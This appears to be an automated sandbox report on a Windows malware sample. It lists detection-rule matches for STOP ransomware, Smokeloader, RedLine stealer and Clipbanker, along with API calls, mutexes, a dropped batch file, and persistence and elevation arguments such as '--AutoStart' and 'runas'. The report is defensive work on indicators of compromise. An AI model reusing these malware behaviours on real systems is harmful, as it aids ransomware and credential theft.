            Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
            Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@58/276@14/13
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,10_2_00411900
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E52564 CreateToolhelp32Snapshot,Module32First,0_2_02E52564
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,10_2_0040D240
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rujtcguJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\E609.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C002.tmpJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "
            Source: unknownProcess created: C:\Windows\explorer.exe
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: pU10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --Admin10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: IsAutoStart10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: IsTask10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --ForNetRes10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: IsAutoStart10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: IsTask10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --Task10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --AutoStart10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --Service10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: X1P10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --Admin10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: runas10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: x2Q10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: x*P10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: C:\Windows\10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: D:\Windows\10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: 7P10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: %username%10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: F:\10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: pU10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --Admin10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: IsAutoStart10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: IsTask10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --ForNetRes10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: IsAutoStart10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: IsTask10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --Task10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --AutoStart10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --Service10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: X1P10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: --Admin10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: runas10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: x2Q10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: x*P10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: C:\Windows\10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: D:\Windows\10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: 7P10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: %username%10_2_00419F90
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCommand line argument: F:\10_2_00419F90
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
